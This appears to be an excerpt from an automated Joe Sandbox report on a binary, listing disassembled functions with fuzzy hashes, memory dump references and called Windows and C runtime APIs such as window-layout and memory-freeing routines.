                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: dd3f39c26adf415086ac2309efb6eaf09980642c4b7ade37af998f162932a15c
                                          • Instruction ID: 9f9633c0360ceb331f8f39b4bf76b7230d0cf0721c9fea56397016732cd48f0e
                                          • Opcode Fuzzy Hash: dd3f39c26adf415086ac2309efb6eaf09980642c4b7ade37af998f162932a15c
                                          • Instruction Fuzzy Hash: 03A01130A022088B83808F38AE882083AACAA00280308022AA008C8020EA2082A0BA00
                                          Function 00F962CA Relevance: .8, Instructions: 829COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                          • Instruction ID: cc4ec5fee0d8c2675515d936b2f858260b0eab4e0561c9ebafd5693c2f32c008
                                          • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                          • Instruction Fuzzy Hash: 9562D771A047849FDF25CF28C8906B9BBE1AF95304F08896EE8DACB346D734E945DB11
                                          Function 00F977EF Relevance: .8, Instructions: 817COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                          • Instruction ID: 5cdd0992d5f1813dc53a0039b4c41476c35285fa779ce7b8a5947d35f39e369a
                                          • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                          • Instruction Fuzzy Hash: 07620671A1C3458FDF19DF28C880AB9BBE1BF95304F18896DE89A8B346D730E945DB11
                                          Function 00F8F461 Relevance: .7, Instructions: 694COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                          • Instruction ID: 016196a677a5010ebb3c59ef100885f530402df901802b7d050af4270dc84535
                                          • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                          • Instruction Fuzzy Hash: 22525B72A087018FC718CF19C891A6AF7E1FFCC314F498A2DE5959B255D334EA19CB86
                                          Function 00F97153 Relevance: .5, Instructions: 536COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 32d2c43ab408ae78f4656082b284b090be08b724d6f725f9a089bda073dde474
                                          • Instruction ID: ff50033e0f204a259460d408cda00402a15a6435d8f467202bb8f31eb30a706c
                                          • Opcode Fuzzy Hash: 32d2c43ab408ae78f4656082b284b090be08b724d6f725f9a089bda073dde474
                                          • Instruction Fuzzy Hash: 2A12E3B16287068FDB18DF28C880AB9B7E0FF94304F14492EE996C7781E334E594EB45
                                          Function 00F8C426 Relevance: .5, Instructions: 454COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51f638f19a129a6d61e9c8ead324d8aafd72bbbf296dfb180c8d92089476538b
                                          • Instruction ID: dfd1fa16477f982eaad0ac2661a7006e183a2b2f75163cd16635e0629f1dbe5a
                                          • Opcode Fuzzy Hash: 51f638f19a129a6d61e9c8ead324d8aafd72bbbf296dfb180c8d92089476538b
                                          • Instruction Fuzzy Hash: 55F1BD71A083018FC714EF29C4846AABBE1FF8A364F144A6EF4C9D7255D730D945ABA2
                                          Function 00F96CDC Relevance: .3, Instructions: 343COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 542406c6e3485b6a596e6790df97a44dbdc19a0931d34910ad42cd3dc20dcb41
                                          • Instruction ID: 86f4d60e98610bc5c2dd4c8a28d55fb813d6585a8aa9fc293a6c3201a35e810e
                                          • Opcode Fuzzy Hash: 542406c6e3485b6a596e6790df97a44dbdc19a0931d34910ad42cd3dc20dcb41
                                          • Instruction Fuzzy Hash: 35D1B4B1A083418FEF14DF28C84475BBBE1BF89318F08456DE889DB252D774E909DB5A
                                          Function 00F8E9B7 Relevance: .3, Instructions: 320COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eaa2ddb5475f3054ec49958ad3a05b87fe95bfe2693bd0f32c3f671588a85a67
                                          • Instruction ID: 900230f7830c5159908aee652c4a2548acb22b154bf31d679a2394937c5eff86
                                          • Opcode Fuzzy Hash: eaa2ddb5475f3054ec49958ad3a05b87fe95bfe2693bd0f32c3f671588a85a67
                                          • Instruction Fuzzy Hash: C2E136755083948FC304CF29D99186ABFF0AF9A300F49095EF9D4D7352C235EA59EBA2
                                          Function 00F94088 Relevance: .3, Instructions: 270COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                          • Instruction ID: 886ae333e96c685fdfa1b0ad296a9d58fa4e833afebb2716ea73b12a2e4639ae
                                          • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                          • Instruction Fuzzy Hash: 989167B16043459BFF28EB64DC94FFA73C4EB70300F10092DE596C7282DB28A586E752
                                          Function 00F943BF Relevance: .2, Instructions: 243COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                          • Instruction ID: 7d3f11ac604249a17e21c23be3e8ea475e1a41865eefceb7d958729dba190fb4
                                          • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                          • Instruction Fuzzy Hash: 99813DB17043465BFF24DE68CC90FBD77D4EBB5304F04092DE9868B282DA64A987A752
                                          Function 00FA51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d8678d4ffb051459e289be6d2decc0d1c7032cbe9183da39d0e453ff903e9ce
                                          • Instruction ID: 81e557f33f6a8604987219f9a06ce5f1b732395d19e0ec0782e62f5dd2679063
                                          • Opcode Fuzzy Hash: 4d8678d4ffb051459e289be6d2decc0d1c7032cbe9183da39d0e453ff903e9ce
                                          • Instruction Fuzzy Hash: DF6189F6E00F0866DE389A686C957BE33D5EF83F60F140519E943DF282D6A5ED42B211
                                          Function 00FA4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                          • Instruction ID: 870ba44d1538620a03d6e1befdb73f9457f2b717899d69740053d18a5fd2ce42
                                          • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                          • Instruction Fuzzy Hash: 05515BE2A04F465BDF3445288956BBF73D9AB83F24F184819E883CB282C549ED05F3A1
                                          Function 00F8EFE2 Relevance: .2, Instructions: 161COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f883381b4e9b9d6c453085aee7066c890a71c1f029611bf5af309871843ff8a3
                                          • Instruction ID: 9ef8f5101f0dfde2749cffc5b583d024c08898375b7ff125f84f833f271aa3f6
                                          • Opcode Fuzzy Hash: f883381b4e9b9d6c453085aee7066c890a71c1f029611bf5af309871843ff8a3
                                          • Instruction Fuzzy Hash: 2051D63590C3D58EC701EF28C5444EEBFE0AF9A314F4909ADE4D95B243D221DA4EEB62
                                          Function 00F900B7 Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 981fd2b680d6028ef55495c17c951eb23388513611c6e50b89bf63104587bf8f
                                          • Instruction ID: 286503116a08092e65b7228e3e6ba29eb3987af2bcda9255dd5113381532b67e
                                          • Opcode Fuzzy Hash: 981fd2b680d6028ef55495c17c951eb23388513611c6e50b89bf63104587bf8f
                                          • Instruction Fuzzy Hash: 7251DFB1A087159FC748CF19D88055AF7E1FF88314F058A2EE899E3340DB34E959CB96
                                          Function 00F93E0B Relevance: .1, Instructions: 112COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                          • Instruction ID: 3177dad1b0266c41c91ecd31e71dc4b66c4ab099a47c5e0625afd3d31b22c64c
                                          • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                          • Instruction Fuzzy Hash: 4C31E7B1A147468FDB18EF28CC512AABBE0FB95314F14452DE495C7341C739EA0ADB92
                                          Function 00F8E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                          Download Yara Rule
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F8E30E
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                            • Part of subcall function 00F91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FC1030,00000200,00F8D928,00000000,?,00000050,00FC1030), ref: 00F91DC4
                                          • _strlen.LIBCMT ref: 00F8E32F
                                          • SetDlgItemTextW.USER32(?,00FBE274,?), ref: 00F8E38F
                                          • GetWindowRect.USER32(?,?), ref: 00F8E3C9
                                          • GetClientRect.USER32(?,?), ref: 00F8E3D5
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00F8E475
                                          • GetWindowRect.USER32(?,?), ref: 00F8E4A2
                                          • SetWindowTextW.USER32(?,?), ref: 00F8E4DB
                                          • GetSystemMetrics.USER32(00000008), ref: 00F8E4E3
                                          • GetWindow.USER32(?,00000005), ref: 00F8E4EE
                                          • GetWindowRect.USER32(00000000,?), ref: 00F8E51B
                                          • GetWindow.USER32(00000000,00000002), ref: 00F8E58D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                          • String ID: $%s:$CAPTION$d
                                          • API String ID: 2407758923-2512411981
                                          • Opcode ID: 8f68d6a2a0d58330b0d9d180f78f1ea3a81b39d814aa46a8a04dad2c65b72b48
                                          • Instruction ID: 61e493e694e35d310a8f1e6f696993d10309864d76d5b3d23db54063cd56fb40
                                          • Opcode Fuzzy Hash: 8f68d6a2a0d58330b0d9d180f78f1ea3a81b39d814aa46a8a04dad2c65b72b48
                                          • Instruction Fuzzy Hash: C081A271608345AFD710EF68CC89AAFBBE9EF89714F04091DFA84D7290D734E9059B52
                                          Function 00FACB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 00FACB66
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC71E
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC730
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC742
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC754
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC766
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC778
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC78A
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC79C
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7AE
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7C0
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7D2
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7E4
                                            • Part of subcall function 00FAC701: _free.LIBCMT ref: 00FAC7F6
                                          • _free.LIBCMT ref: 00FACB5B
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FACB7D
                                          • _free.LIBCMT ref: 00FACB92
                                          • _free.LIBCMT ref: 00FACB9D
                                          • _free.LIBCMT ref: 00FACBBF
                                          • _free.LIBCMT ref: 00FACBD2
                                          • _free.LIBCMT ref: 00FACBE0
                                          • _free.LIBCMT ref: 00FACBEB
                                          • _free.LIBCMT ref: 00FACC23
                                          • _free.LIBCMT ref: 00FACC2A
                                          • _free.LIBCMT ref: 00FACC47
                                          • _free.LIBCMT ref: 00FACC5F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
